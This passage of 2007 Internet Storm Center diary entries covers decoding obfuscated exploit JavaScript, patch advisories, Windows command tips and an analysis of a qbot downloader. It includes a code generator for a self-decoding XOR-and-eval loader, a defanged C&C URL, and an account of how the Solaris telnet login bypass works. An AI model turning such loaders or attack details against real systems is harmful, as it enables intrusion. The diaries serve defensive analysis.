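As an added illustration of the Perl-Fu method (written here in Python rather than Perl, and not from the original diary), the block below builds a constructed two-stage XOR loader of the kind the method targets, then recovers the payload by parsing out the key and hex blob and redoing the arithmetic itself, without ever evaluating the script. The make_loader helper exists only to manufacture the sample; decode_loader is the hand-translated decoder, and peel() mirrors the "feed each stage back in" workflow of the textarea method. All names and the sample payload are my own.

```python
import re


def make_loader(payload, key):
    """Build a constructed sample: a self-decoding one-liner that XORs each byte of a
    hex blob with a one-byte key and eval()s the result. It exists only to produce
    test material and is not taken from any real exploit page."""
    blob = "".join(f"{b ^ key:02x}" for b in payload.encode("latin-1"))
    return (f'var k={key};var s="{blob}";var o="";'
            'for(i=0;i<s.length;i+=2)o+=String.fromCharCode(parseInt(s.substr(i,2),16)^k);'
            'eval(o);')


# The Perl-Fu step: read the decoding routine, pull out the key and the blob, and
# redo its arithmetic here instead of running the script.
LOADER_RE = re.compile(r'var k=(\d+);var s="([0-9a-fA-F]+)";.*?eval\(o\);', re.S)


def decode_loader(js):
    """Return the decoded next stage, or None if the text is not a loader we recognise."""
    m = LOADER_RE.search(js)
    if not m:
        return None
    key = int(m.group(1))
    blob = bytes.fromhex(m.group(2))
    return bytes(b ^ key for b in blob).decode("latin-1")


def peel(js, max_stages=5):
    """Decode repeatedly, the way one feeds each textarea result back into the
    decoder, until the output no longer looks like a loader."""
    stages = [js]
    for _ in range(max_stages):
        nxt = decode_loader(stages[-1])
        if nxt is None:
            break
        stages.append(nxt)
    return stages


if __name__ == "__main__":
    inner = "document.write('final stage reached')"
    sample = make_loader(make_loader(inner, 0x5a), 0x21)
    for i, stage in enumerate(peel(sample)):
        print(f"stage {i}: {stage[:60]}...")
```

The regular expression is deliberately tied to one loader shape; that is the trade-off the Con above describes, since each new encoder means reading its routine and writing a new decoder, while the payoff is that nothing from the hostile page is ever executed.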

The Monkey Wrench Method
Use the stand-alone JavaScript interpreter "SpiderMonkey" to run the encoded JavaScript block. Replace document.write(txt) with print(txt) before doing so, since SpiderMonkey doesn't have any document object by default.

Pro: Little hassle, good results, fast method to get around a hard "outer shell" of a Javascript block encoded multiple times, works well in combination with the Perl-Fu method.
Con: Fails for Javascript code deliberately written to only uncompress on Internet Explorer.

Caveat: For the first two methods mentioned, be mindful that you are actually running hostile code inside a potentially vulnerable web browser. Make sure to apply the usual precautions (VMWare or the like, deployed far away from any production network you might have, and keeping a keen eye on the firewall log, etc).

...and before you write in to ask: Yes, concrete examples on how to use the four methods above will follow later today :)


Published: 2007-02-16

Funky Apple Updates after 2007-0002

/** I am an Apple fanboy, so I am not picking on Apple **/

That being said, it seems we have found a buggy little feature of OSX after installing Security Update 2007-0002.

It asks us to reinstall Security Update 2007-0001 and iTunes/Quicktime update of 7.0.2.

Now, we have been testing this on many OSX machines, and it appears to be isolated to:

  • PPC Arch Only (We haven't been able to reproduce on Intel based machines)
  • 10.4.8 (We can't reproduce on 10.3, only 10.4) and
  • Those machines that are patched to 2007-0001 level

We are actually testing one machine right now that is a fresh build from CD, upgraded a month ago to 10.4.8, and that machine is having many problems even getting to the point where it is able to download Security Update 2007-0001, let alone version 0002.
  • It had problems with Installing the latest Java update but succeeded after a second try
  • It cannot complete the download of iTunes+Quicktime 7.0.2 (download freaks out halfway)
  • It does download Security Update 2007-0001, but fails to install it 
  • It never was allowed to download Security Update 2007-0002 so far
The /var/log/install.log file looks like this:
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: Distribution: iTunes + QuickTime
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: Distribution: Security Update 2007-001
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: JavaScript error "Value undefined (result of expression system.ASUEnumerateProducts) is not object." while running "__choice_su_visible"
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: __choice_su_visible returned error: Value undefined (result of expression system.ASUEnumerateProducts) is not object.
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: JavaScript error "Value undefined (result of expression system.RegistryQueryStringValue) is not object." while running "__choice_su_visible"
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: __choice_su_visible returned error: Value undefined (result of expression system.RegistryQueryStringValue) is not object.
admin auth received to install


As of this time we have filed a bug with Apple. If you have any comments, can reproduce the error, or can't reproduce the error (CHECK YOUR VERSIONS), please write in.

Joel Esler


Published: 2007-02-16

New Challenge - Charlotte's Web Site

Salutations, challenge fans!  I just posted a new challenge to test your skills over at Ethical Hacker dot Net.  This time around, I've woven a web for you to untangle, set in the after-story of Charlotte's Web.  This book is one of my favorites and features a spider named Charlotte who has to save Wilbur the pig by building spider webs with words like "Terrific" and "Some Pig" in them.  In my challenge, you'll get to match wits with Lurvy, the farm hand, and decipher Charlotte's new plan to save Wilbur.  Answers are due by March 16, 2007.  Access the challenge here.

--Ed Skoudis
SANS Instructor
Handler, Internet Storm Center


Published: 2007-02-16

SpamAssassin Release version 3.1.8

Looks like a new version of SpamAssassin (SA) came out yesterday, version 3.1.8.  Take a look at the advisory here.

This looks like a maintenance AND security release.  It patches CVE-2007-0451, a "possible DoS due to incredibly long URIs found in the message content".

Time to patch!

Joel Esler


Published: 2007-02-15

Apple Security updates released

Apple released a security update today for users of Mac OS X v10.3.9 and v10.4.8 (including OS X Server):

  • Mounting a maliciously-crafted disk image could lead to a crash or arbitrary code execution (CVE-2007-0197)
  • Attackers on the local network can cause iChat to crash. A proof of concept was published in January (CVE-2007-0614 and CVE-2007-0710)
  • By using iChat AIM to visit a maliciously crafted URL an attacker could trigger an overflow, leading to a crash of the application or arbitrary code execution.
  • The UserNotificationCenter runs with elevated privileges in a local user context. This update forces the application to drop its group privileges shortly after starting. While this does not fix a directly exploitable vulnerability in itself, it fortifies the overall security posture of the application.

Security Update 2007-002, which contains these fixes, can be downloaded at Apple Downloads. Also have a look at these Java and DST updates.



Published: 2007-02-15

Clamav security vulnerabilities

The Clamav development team released version 0.90 of their open-source antivirus toolkit today. This version contains fixes for security vulnerabilities described in a number of iDefense advisories that were simultaneously published.

ClamAV CAB File Denial of Service Vulnerability (CVE-2007-0898)
Remote attackers can perform a service degradation attack by sending a malformed CAB file through a gateway scanner running ClamAV. The vulnerability can prevent ClamAV from scanning archives successfully by depleting the available local file descriptors. iDefense investigated a number of common setups and observed that in most cases, mails that cannot be scanned will be auto-denied.

ClamAV MIME Parsing Directory Traversal Vulnerability (CVE-2007-0897)
An input validation bug allows a remote user to overwrite files on the system that are owned by the clamd scanner. A potential target mentioned in the advisory is the virus database. By overwriting this file, the scanner's effectiveness against certain threats can be reduced significantly.

Both vulnerabilities were resolved in ClamAV's new stable 0.90 release. Do note that users who automatically download and install signature updates are not automatically covered. When vulnerabilities in anti-virus software are addressed, it is important to understand whether they are fixed in the signatures or in the scanning engine. Depending on the solution in use, most setups are configured to automatically update the former, while the latter may require separate upgrades.



Published: 2007-02-14

Going Mobile

Earlier today, Symantec released a security advisory detailing a vulnerability in how Palm OS Treo smartphones allow users to access data. Users with physical access to the device are able to use the Find feature to locate data, even when the device is locked. As a fix has not yet been released, Symantec advises notifying users so they are aware of this weakness and can take other actions to prevent disclosure of sensitive data.

Virtually all of your organizations are currently supporting the use of mobile devices in one way, shape or form. That these may impact the organization's security posture has been proven by new threats such as cell phone viruses (Commwarrior, Cabir) and Bluetooth hacking. These examples show that an understanding of wireless technology needs to be built into all security capabilities within the organisation; not just into policy statements, but also in their respective translation into procedures, guidelines and the supporting awareness programs.

If you're looking for inspiration, have a look here:

Australia's DSD government policy on Blackberry security
DRAFT NIST Guidelines on Cell Phone Forensics

Any other good examples you know of ? Drop us a message.

Maarten Van Horenbeeck


Published: 2007-02-14

Cisco ASA, Pix, and FWSM Vulnerabilities

The Valentine's presents keep coming!  Cisco released some pretty interesting advisories today.  Patches are available, and you should definitely check them out if you are a Cisco shop.

Cisco PIX and ASA, Advisory ID: cisco-sa-20070214-pix
Cisco Firewall Services Module, Advisory ID: cisco-sa-20070214-fwsm

Flaws can lead to denial of service, reloading of images in the device, and possible admission of unwanted traffic through ACLs.


Published: 2007-02-14

Finding Files and Counting Lines at the Windows Command Prompt

Yesterday, Microsoft delivered to us a bouquet of a dozen patches, just in time for our Valentine’s Day celebration today.  With those patches, and a recent inundation of other vulnerabilities (Solaris Telnet?  Are you kidding me?), I’d like to do a quick change of pace to give you a couple of fun tips for using the Windows command line.

It’s become something of a ritual around here.  Whenever I’m Handler on Duty, I reinforce my ultimate goal of eliminating the Windows GUI from use by administrators and incident handlers by writing a tip or two for using the Windows command line.  One of the most frequent questions I get recently whenever I teach a SANS session on the Windows command line involves searching for files with a given name.  Suppose, for example, that you want to find the program wmic.exe in your directory structure.  There are two approaches I use:

First, you can change into a given directory that you want to search (such as C:\windows\system32), and then run the dir command appropriately:

C:\> cd c:\windows\system32
C:\> dir /s /b wmic.exe

The /s means that we want to recurse subdirectories.  The /b means that we want the bare form of output (which will omit the volume information, ., and .. from our listing).  When /b is used with /s, it will print out the full path to the item for which we search (context-specific command flags that change their behavior in light of other flags can be trouble for memorization, I admit).  The downside of doing this is that you have changed out of your current directory to do the search.

But, diligent readers Michael Wilson, Chris Wolf, and a reader desiring anonymity have pointed out that you can search for something without changing your current directory by running the command thusly:

C:\> dir /s /b c:\windows\system32\wmic.exe

It looks like this command would only find a wmic.exe if it is system32 itself, but it actually looks through system32 and all of its subdirectories, doing just what we want.  Pretty cool!  And, you don't lose your current directory in the process.

The second approach is to use the dir command again, but to scrape through its output using the find command, as in:

C:\> dir /s /b c:\windows\system32 | find "wmic.exe"

The first approach has better performance (because we are not scraping through Standard Out).

Oh, and another frequent question I get: How can I do a line count on the output of another command?  UNIX and Linux folks frequently use "wc -l" to count stuff.... How can we do this in Windows?  Suppose, for example, you wanted to count the number of files and subdirectories inside of c:\temp.  There is no wc command built in, but here is a method I use:

C:\> dir /b c:\temp | find /c /v "~~~"

The dir command gets a directory listing, in bare format (/b) of c:\temp.  I use the find command to count (/c) lines that DO NOT contain (/v) the string ~~~.  It would be very unusual to have that string, so it gives me a pretty accurate line count.  If you are really concerned about having such lines, you can run it without the /v and make sure the count is 0.  Also, you can recurse subdirectories using /s, as you might expect.  And, this technique can also be used to count other things, like the number of running processes called svchost.exe, using the tasklist command (built into Win XP Pro and 2003):

C:\> tasklist /fi "imagename eq svchost.exe" | find /c /v "~~~"

Don’t forget to subtract the appropriate number of column headers and footer lines from your output (in the case of tasklist, you have to subtract 3, because of the Column titles, the ===== under the columns, and an extra carriage return it puts at the end).   Attentive reader Chris Luhman mentioned that you can use the /nh option in tasklist to get it to omit the header (nh stands for no header).  Then, you'll only have to subtract one from the output.  It is an odd but recurring thing in Windows command line tools.  They often put an extra line at either the beginning or the end of their output.  I see this a lot with wmic.

Oh, and there are other things you can do with the line count method I've described above.  For example, to count the number of lines in your win.ini file, you can use the type command (the rough equivalent to the UNIX cat command):

c:\> type c:\windows\win.ini | find /c /v "~~~"

And the list goes on and on...

This is a rather contrived way of doing a line count, but it works very nicely for me.  If you know of a better way, using only built-in Windows commands, please let me know.

--Ed Skoudis
Handler on Duty


Published: 2007-02-13

Valentine card - be sure not to get more than what you expect

Every opportunity where people send each other cards is one of those times the bad folks out there try to do their thing.

Valentines day is no exception to that rule.

We can all try to educate users not to click on attachments that are unexpected or from unknown senders, but how is that going to hold up in real life against the possibility of a hot date with a secret admirer?

We can try to tackle the problem with technology that scans incoming messages, removes executable content, repetitive content (spam), etc. But signature-based systems will leak exploits, repetition might not always be there and the first few will be passed on regardless, and perhaps worst of all, users are generally willing to go to great lengths to get their prize and work around extension-based filtering.

We could also try to promote not sending media rich wishes. We can lead by example. Simple text in plain old ASCII will do the trick just as well as a 5 Mbyte powerpoint presentation, flash animation or even HTML email.

Anyway, make sure to have a happy February 14th without catching one of these:

Symantec: Trojan.PPDropper.G

Oh, yes it's likely using a fresh so called 0-day, so it seems we'll have more Office patches in a few months time.

With thanks to Juha-Matti for being the first to point it out to us. Thanks for some inspiration, Steve.
Swa Frantzen -- NET2S


Published: 2007-02-13

uTorrent exploit public

uTorrent is -I'm told anyway- a popular bittorrent implementation.

It has a publicly available buffer overflow against it, and hence the vulnerability and publication of a matching exploit might cause significant additional risk to your machines/installed user base.

Corporate IT/security managers might -while at it- make sure they are in a position to knowingly allow tools on company owned machines that are mostly, if not exclusively, used for copyright infringements. I'd highly recommend a chat with your legal department on their view on the matter.

Yes, there are some genuine uses of peer-to-peer file sharing, but where they cannot be avoided they are perhaps better handled by an exception or two in the policies.

Swa Frantzen -- NET2S


Published: 2007-02-13

Cisco IOS IPS vulnerabilities

Cisco released details on vulnerabilities in IOS based IPS.

The vulnerabilities allow IPS evasion and DoS against the device. An upgrade of the IOS version is recommended.

See the Cisco bulletin for more details.

Swa Frantzen -- NET2S


Published: 2007-02-13

Microsoft Black Tuesday patches - February 2007

Overview of the February 2007 Microsoft patches and their status.

Each entry lists the affected component, contra indications, known exploits, the Microsoft rating, and the ISC rating(*) for clients / servers.

MS07-005 - Remote code execution in Step-by-Step Interactive training, replaces MS05-031
  Affected: Step-by-Step Interactive training
  Contra indications: No known problems (KB 923723)
  Known exploits: No known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Less Urgent

MS07-006 - Privilege elevation in Windows Shell, replaces MS06-045
  Contra indications: No known problems (KB 928255)
  Known exploits: No known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Less Urgent

MS07-007 - Privilege elevation in Windows Image Acquisition
  Affected: Image Acquisition
  Contra indications: No known problems (KB 927802)
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating: clients Important / servers Less Urgent

MS07-008 - Remote code execution in HTML Help ActiveX
  Contra indications: No known problems (KB 928843)
  Known exploits: Exploit expected to become public soon
  Microsoft rating: Critical
  ISC rating: PATCH NOW

MS07-009 - Remote code execution in Microsoft MDAC ActiveX. Workaround through a killbit; if you did not do that already: PATCH NOW
  Affected: MDAC ActiveX
  Contra indications: No known problems (KB 927779)
  Known exploits: Public exploits since Oct 24th, 2006
  Microsoft rating: Critical
  ISC rating: Critical

MS07-010 - Remote code execution in Microsoft Malware Protection Engine. This will automatically update.
  Affected: Microsoft malware protection
  Contra indications: No known problems (KB 932135)
  Known exploits: No known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Critical

MS07-011 - Remote code execution in Microsoft OLE dialog
  Contra indications: No known problems (KB 926436)
  Known exploits: Exploit publicly available
  Microsoft rating: Important
  ISC rating: clients Critical / servers Important

MS07-012 - Remote code execution in Microsoft Foundation Class
  Affected: Microsoft Foundation Class
  Contra indications: No known problems (KB 924667)
  Known exploits: No known exploits
  Microsoft rating: Important
  ISC rating: clients Critical / servers Important

MS07-013 - Remote code execution in RichEdit, also affects Mac OS X versions of Office.
  Contra indications: No known problems (KB 918118)
  Known exploits: No known exploits
  Microsoft rating: Important
  ISC rating: clients Critical / servers Important

MS07-014 - Multiple vulnerabilities in Word leading to remote code execution, replaces MS06-060
  Contra indications: No known problems (KB 929434)
  Known exploits: Actively used and publicly known exploits.
  Microsoft rating: Critical
  ISC rating: PATCH NOW

MS07-015 - Multiple vulnerabilities in Office leading to remote code execution, replaces MS06-062
  Contra indications: No known problems (KB 932554)
  Known exploits: Actively exploited
  Microsoft rating: Critical
  ISC rating: PATCH NOW

MS07-016 - Multiple vulnerabilities in Internet Explorer leading to remote code execution, replaces MS06-072
  Contra indications: No known problems (KB 928090)
  Known exploits: Exploits expected to be released soon
  Microsoft rating: Critical
  ISC rating: PATCH NOW

We will update issues on this page as they evolve.
We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- NET2S


Published: 2007-02-13

Y3K problems ?

I almost had a déjà-vu moment when I read: CVE-2007-0842
So time handling functions in Visual C++ 8.0 can't go beyond Jan 1st 3000. Didn't the industry learn almost a decade ago that dates move on and that building in any arbitrary limit is a bad idea(tm)?

To add insult to injury, it's not that it returns something indicating it can't handle a date that far in the future; it simply throws an exception and terminates the application, opening the door to a DoS.

Swa Frantzen -- NET2S.com


Published: 2007-02-12

New Java update (1.5.0u11) and a Microsoft Word 2000 vulnerability

Sun recently released (another) update for Java 1.5.0, Update 11. There are a bunch of bug fixes and I didn’t see anything serious related to security.
However, it is worth noting that this update contains time zone data that incorporates the Daylight Saving Time changes for 2007 (we wrote about this previously, http://isc.sans.org/diary.html?storyid=2142, but will use another opportunity to remind you about the changes).
Java update should be available automatically now as well – just remember to remove the old update revisions if you don’t need them any more (after you’ve thoroughly tested all your applications, of course).

McAfee published information about a new 0-day exploit for Word. They’ve notified Microsoft and it looks like the vulnerability is limited to Denial of Service. We’ve updated the list of 0-days in Microsoft products which you can find here: http://isc.sans.org/diary.html?storyid=1940.


Published: 2007-02-12

Encrypted malware and code reusability

About 3 weeks ago, one of our readers, Andrew, submitted a very interesting malicious binary. Andrew did some analysis himself and told us that he found encrypted files and some certificates which immediately caused interest amongst handlers.
If you are regularly reading ISC, you probably read the diary I wrote back in January about unsophisticated malware (http://isc.sans.org/diary.html?storyid=2022). Well, this time, things were completely different.

Initial analysis by Andrew showed that the machine was infected with a VML exploit. A small binary is dropped on the infected machine which, in this case, was a bit more than a typical downloader.

The analysis of unknown malicious programs can be a very difficult task. The first step in any analysis is to determine whether the binary is packed or not. PEiD (http://peid.has.it), a tool I mentioned in the previous diary, quickly determined that the binary was packed with UPX. UPX is a very common packer that is easy to unpack: various utilities exist that can help you with unpacking UPX, and even doing it manually is very simple.

Once the binary is unpacked, you will typically want to run the strings command on the unpacked code, to see if there is anything you can determine quickly by manually inspecting the strings output.
The following two lines looked very interesting:

inflate 1.2.3 Copyright 1995-2005 Mark Adler
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

It looks like our malware has been linked with zLibDll, an open source ZLIB compression library. This also explained what Andrew was seeing as he said that a password protected ZIP file was downloaded by the downloader. A quick search of potential passwords did not result in anything so we concluded that the binary must either generate the password with some code, or download it from the Internet. In this case, the second assumption was correct.

Now we come to the most interesting (and difficult) part. You could, of course, manually analyze the disassembled malware code (IDA Pro is of great help here, if you can afford it), but an easier approach (in my opinion) is to run the downloader through a debugger and carefully watch what it is doing. The debugger of my choice is, of course, OllyDbg (http://www.ollydbg.de), which is the best free debugger for the Windows operating system.
In order to debug a program you will need x86 assembly knowledge, so this would be a good time to refresh it (or read some books about it).

The debugging process is relatively simple: you load a file into the debugger, and execute it step by step while carefully watching what’s going on.
The downloader in question did the usual stuff. After copying itself into the C:\Documents And Settings\All Users folder, it opened an HTTP connection to the control Web server:

http://ijk [dot] cc/cgi-bin/ [REMOVED] oadfile=q/q2_started_ok
(the site is still up)
Once it registered properly, the downloader downloaded a file called qa.zip, which was the password protected ZIP archive.
Now came the interesting bit. By stepping through the binary with the debugger, we were able to determine the password used to protect the archive. You can see how it slowly appears in the EDI register (the real password is much longer, which makes brute forcing the ZIP archive difficult). A method similar to this one is always used when malware generates a password programmatically: it will keep it either in one of the registers or somewhere in memory.


Knowing the password it is easy to extract the ZIP archive now and as the standard ZIP format was used this can be done even with a standalone ZIP program.

The archive contained some interesting binaries:

$ ls -l
total 144
drwxr-xr-x 2 test test 4096 Jan 10 19:57 .
drwxr-xr-x 4 test test 4096 Feb 12 14:05 ..
-rw-r--r-- 1 test test 1505 Aug 10 2005 cert.pem
-rw-r--r-- 1 test test 692 Jan 8 09:49 crontab.cb
-rw-r--r-- 1 test test 432 Jan 8 09:49 _qbot.cb
-rw-r--r-- 1 test test 96768 Jan 8 09:30 _qbot.dll
-rw-r--r-- 1 test test 20480 Dec 29 08:19 _qbotinj.exe
-rw-r--r-- 1 test test 600 Jan 8 09:49 updates.cb

Casual inspection of files did not show much and we concluded that all the .cb files were encrypted (or obfuscated) as they had purely binary contents. The cert.pem file was obviously used as some kind of a certificate to encrypt something. So we continued with the debugging of the main downloader.

After some time spent on it, the part that decrypted the *.cb files was executed. It was a simple obfuscation function. In cases like this, what most analysts typically do is write a Perl program that does the same thing, so you can decrypt the files without running the malware.
The file contents were pretty obvious: updates.cb contained a list of URLs to update from and _qbot.cb contained information about the C&C IRC servers.
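Both this paragraph and the "Perl-Fu" method earlier on this page describe the same workflow: once the decoding routine has been recovered from the debugger, re-implement it in a scripting language and decode the blobs offline instead of running the sample. The block below is an added example of that workflow, not the analysed bot's routine, whose real algorithm the diary does not give. The obfuscation it implements (a byte-wise XOR with a keystream derived from a one-byte seed) and the config text it decodes are constructed stand-ins; the seed-recovery step shows how to proceed when the key itself was not captured from a register.

```javascript
// Added example (not the analysed malware's code): re-implement a recovered
// obfuscation routine so *.cb-style config blobs can be decoded offline.
// The routine is a CONSTRUCTED stand-in: byte i is XORed with (seed ^ i).
// In a real case you transcribe the routine seen in the disassembly instead.

function keystream(seed, length) {
  const ks = Buffer.alloc(length);
  for (let i = 0; i < length; i++) ks[i] = (seed ^ i) & 0xff;
  return ks;
}

// XOR is its own inverse, so the same function obfuscates and decodes.
function xorWithKeystream(blob, seed) {
  const ks = keystream(seed, blob.length);
  const out = Buffer.alloc(blob.length);
  for (let i = 0; i < blob.length; i++) out[i] = blob[i] ^ ks[i];
  return out;
}

// True if the buffer is printable ASCII plus tab/CR/LF only.
function looksLikeText(buf) {
  for (const b of buf) {
    const ok = (b >= 0x20 && b <= 0x7e) || b === 0x09 || b === 0x0a || b === 0x0d;
    if (!ok) return false;
  }
  return true;
}

// If the seed was not captured in the debugger, try all 256. Printability alone
// is not enough (a wrong key can still yield printable junk), so also require a
// marker the config is known to contain, such as a URL scheme.
function recoverSeed(blob, marker) {
  for (let seed = 0; seed < 256; seed++) {
    const out = xorWithKeystream(blob, seed);
    if (looksLikeText(out) && out.toString('latin1').includes(marker)) return seed;
  }
  return -1;
}

// Decode a blob into config lines, recovering the seed first.
function decodeConfig(blob, marker = 'http://') {
  const seed = recoverSeed(blob, marker);
  if (seed < 0) throw new Error('no seed produced a plausible config');
  const text = xorWithKeystream(blob, seed).toString('latin1');
  return { seed, lines: text.split('\n').filter(Boolean) };
}

// Constructed sample in the spirit of updates.cb / _qbot.cb: update URL,
// IRC C&C host and channel, obfuscated here with seed 0x5a.
const SAMPLE_CONFIG = 'http://update.example.invalid/q/qa.zip\nirc.example.invalid:6667\n#channel\n';
const SAMPLE_SEED = 0x5a;
const SAMPLE_BLOB = xorWithKeystream(Buffer.from(SAMPLE_CONFIG, 'latin1'), SAMPLE_SEED);

console.log(decodeConfig(SAMPLE_BLOB));
```

Decoding this way yields the update URLs and C&C hosts as plain text that can go straight into proxy and firewall blocklists, which is the defensive payoff of the analysis, and it does so without the sample ever executing on the analyst's machine.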

The last thing that puzzled us was the certificate: what was it used for? The answer was in the _qbot.dll file. This file contains the main IRC bot, which is injected into another process and executed. Analyzing this file revealed that it was linked with another package (this time commercial), called MatrixSSL. MatrixSSL is a library by PeerSec Networks (http://www.peersec.com/matrixssl.html) that allows applications to support SSL/TLS. This was obviously used by the malware to encrypt its network communication. In this case, the cert.pem file was used to connect to the IRC C&C server and encrypt the session, so network IDS tools would not see any commands issued to the bot.

As most anti-virus analysts have already seen, malware authors often reuse their code. It's not strange to see code from one malware family used in another. This case showed us that malware authors are happy to use open source or even commercial packages that can help them. And they treat their programs as full-blown projects, as one string from the bot's binary confirmed: J:\projects\qbot\matrixssl\src\matrixSsl.c.

Finally, the AV detection on the submitted files is still very bad, even weeks after they were released. The original downloader was detected by only a handful of AV programs, while the second stage (the real bot) was detected by only 3 programs. It is clear that you cannot rely only on an AV program and that you should have defense in depth. In this case, blocking outgoing TCP traffic would at least prevent the bot from contacting the C&C server and doing more harm on your internal network.


Published: 2007-02-12

* Another good reason to stop using telnet

There is a major zero day bug announced in Solaris 10 and 11 with the telnet and login combination.
It has been verified. In my opinion NOBODY should be running telnet open to the internet.
The issue:
The telnet daemon passes switches directly to the login process which looks for a switch that allows root to login to any account without a password. If your telnet daemon is running as root it allows unauthenticated remote logins.

Telnet should be disabled. Since 1994 the cert.org team has recommended using something other than plain text authentication due to potential network monitoring attacks. http://www.cert.org/advisories/CA-1994-01.html
“We recognize that the only effective long-term solution to prevent these attacks is by not transmitting reusable clear-text passwords on the network.“

If remote shell access is required, ssh is a better choice than telnet. We have done articles about securing ssh in the past. http://isc.sans.org/diary.html?storyid=1541

The FIX:
To disable telnet in Solaris 10 or 11 this command should work.
svcadm disable telnet

The Mitigations:
If you must run telnet on your Solaris system, limit your exposure: it is recommended that you use firewall(s) to restrict which IPs can connect to your telnet services.

Another mitigation that works is this:
inetadm -m svc:/network/telnet:default exec="/usr/sbin/in.telnetd -a user"

I am not going to include the site with the exploit. No special tools are required to exploit this vulnerability.

Thanks to Chris and Thomas who notified us of this issue and all the fellow handlers that helped verify, mitigate and review this report.


Published: 2007-02-11


Megel, an Internet Storm Center contributor, alerted us to a new German spam with a file that claims to be a PDF but is really a downloader. He started seeing this file arrive via email Friday AM.
The message is basically a "thank you for your order, read the enclosed PDF for details" type message. Not very original or new, but it must work or the hackers would quit using this approach.

Original text from one sample message (translated from German; umlauts were already stripped in the sample):

Good day,
Thank you very much for your order!
The goods you ordered are fully in stock and will be shipped to you promptly
by the logistics department.
Attached you will find your quotation/order in PDF format with receipt no.
Open the attached PDF files with Acrobat Reader. You can download it free of charge from
http://www.adobe.de/products/acrobat/readstep2.html.
To ensure the fastest possible handling of your queries, please always state your
customer number 77316 and receipt number [3816712] when making enquiries.

Many thanks
With kind regards
Eberhard Schmidt
TMS Logistik GmbH

Call Center:
tel (0180) 31 57 16 21 - 0.09 EUR/min from the German landline network/T-Com
fax (030) 90 16 - 29 19
web www.tms-logistik.de

Berlin branch
Albrechstrasse 117
D-01271 Berlin
In a nutshell - your advantages as a TMS Logistik customer

o 14-day right of return on new goods in original packaging
o Advice from our specialist sales staff
o Transparent pricing and availability display
o All-round protection through an optional service package
o Free parking
o Convenient delivery by us or by DHL
o Free 80-page complete catalogue - also by post to your home
TMS Logistik - successful in Berlin for 12 years

Results from VirusTotal show it is detected by some AV engines, but mostly generically as some type of downloader.

AntiVir 02.09.2007 TR/Dldr.iBill.L
Authentium 4.93.8 02.09.2007 W32/Downloader.BBAV
Avast 4.7.936.0 02.11.2007 no virus found
AVG 386 02.10.2007 Generic3.SE
BitDefender 7.2 02.11.2007 no virus found
CAT-QuickHeal 9.00 02.09.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.11.2007 Trojan.Downloader-1405
DrWeb 4.33 02.11.2007 Trojan.DownLoader.18372
eSafe 02.09.2007 no virus found
eTrust-Vet 30.4.3384 02.10.2007 no virus found
Ewido 4.0 02.11.2007 no virus found
Fortinet 02.11.2007 DwnLdr.GAI!tr
F-Prot 02.09.2007 W32/Downloader.BBAV
F-Secure 6.70.13030.0 02.10.2007 Trojan-Downloader.Win32.Nurech.aj
Ikarus T3.1.0.31 02.11.2007 Trojan-Downloader.Win32.BBAV
Kaspersky 02.11.2007 Trojan-Downloader.Win32.Nurech.aj
McAfee 4960 02.09.2007 New Win32
Microsoft 1.2204 02.11.2007 no virus found
NOD32v2 2052 02.11.2007 no virus found
Norman 5.80.02 02.09.2007 no virus found
Panda 02.11.2007 Suspicious file
Prevx1 V2 02.11.2007 no virus found
Sophos 4.13.0 02.08.2007 no virus found
Sunbelt 2.2.907.0 02.09.2007 VIPRE.Suspicious
Symantec 10 02.11.2007 no virus found
TheHacker 02.11.2007 Trojan/Downloader.Nurech.aj
UNA 1.83 02.09.2007 no virus found
VBA32 3.11.2 02.10.2007 no virus found
VirusBuster 4.3.19:9 02.10.2007 no virus found

Additional Information
File size: 8522 bytes
MD5: 5da184f16450d90b4c4fbec26d559130
SHA1: 16e5b73c82baad5a765123133ef87707e311d8da
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics


Published: 2007-02-11

Decoding Diyer’s Ascii bypass:

A user wrote in that he was seeing some exploit sites using the "cooldiyer" ASCII encoding for web filtering bypass.
The user's question was: how can these be decoded?

Thanks to DanielW, another handler, we have an answer.
"This one is very straightforward to decode - all you have to do is convert it into 7-bit ASCII or clear the highest bit with some Perl-Fu like cat gamefile.htm | perl -pe 's/(.)/chr(ord($1)&127)/ge'.
This is what they do with the HTML line above the code block as well (charset US-ASCII is 7-bit). The decoded URL is a plain ordinary MS.XMLHTTP exploit which tries to download svc.exe, but this file is no longer there."

I do want to warn users: sites using this are mostly BAD sites with malware and exploits on them. Be very careful about any site you find using this, as it could have an exploit for your web browser/OS that you have no defenses against.
